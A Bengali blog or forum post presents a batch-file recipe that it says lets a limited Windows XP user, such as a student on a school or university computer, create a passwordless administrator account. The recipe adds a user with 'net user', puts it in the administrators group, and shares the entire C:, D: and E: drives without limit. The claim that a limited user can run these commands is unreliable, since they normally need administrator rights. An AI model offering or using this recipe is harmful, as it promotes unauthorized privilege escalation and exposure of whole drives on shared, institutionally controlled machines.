
উইন্ডোজ এক্সপি তে সাধারনত একজন লিমিটেড ইউজার কখনো এডমিনিট্রেটিভ ক্ষমতা সম্পন্ন একাউন্ট খুলতে পারে না। লিমিটেড ইউজার ও এডমিনিট্রেটিভ ক্ষমতা সম্পন্ন ইউজার এর মধ্যেকার পার্থক্য বোধকরি বলতে হবে না। শুধু মাত্র এই টুকু বলি সাধারনত স্কুল ও বিশ্ববিদ্যালয় গুলোতে শিক্ষার্থীদের কে লিমিটেড ইউজার দিয়ে কম্পিউটার ব্যবহার করতে দেয়া হয় যাতে তারা ইন্টারনেট ব্যবহার করতে না পারে।এডমিনিট্রেটিভ ক্ষমতা সম্পন্ন একাউন্ট কি করে খুলতে হয় তাই আজকে বলব ।
প্রথমে নোটপ্যাড খুলুন
নোটপ্যাড এ নিচের লেখা গুলো টাইপ করুন
net user arman /add
net localgroup administrators arman /add
net share system=C:* /unlimited
net share system=D:* /unlimited
net share system=E:* /unlimited
খেয়াল করুনঃ
এখানে নেট ইউজার এবং নেট লোকাল গ্রুপ এডমিনিস্ট্রেটরস এর পর আমার নাম আমি ব্যবহার করেছি কারন আমি এই নামেই নতুন একাউন্টটি খুলতে চাচ্ছি তাই আপনি আপনার পছন্দ মত নাম ব্যবহার করতে পারেন।
এবার নোটপ্যাডটি যেকোন নাম দিয়ে শেষে ডট ব্যাট (.bat) যোগ করে সেভ করুন।
এবার ব্যাট ফাইলটি ডাবল ক্লিক করে চালু করুন ৫ সেকেন্ডের মধ্যে আপনার কাংখিত এডমিনিট্রেটিভ ক্ষমতা সম্পন্ন একাউন্ট তৈরী হয়ে যাবে যা কোন পাসোয়ার্ড ছাড়া ব্যবহার করা যাবে।
এবার কন্ট্রোল প্যানেল এ গিয়ে ইউজার একাউন্টসে ক্লিক করে চেক করুন আপনার কাংখিত একাউন্টটি তৈরী হইয়েছে কিনা।
কাজ না হলে বা কোন সমস্যা হলে মেইল করতে পারেন।
arman@southern-bd.net
জেনারেল হবার পর এইটা আমার ২য় পোষ্ট।

প্রথমটা সরিয়ে দেয়া হয়েছে।
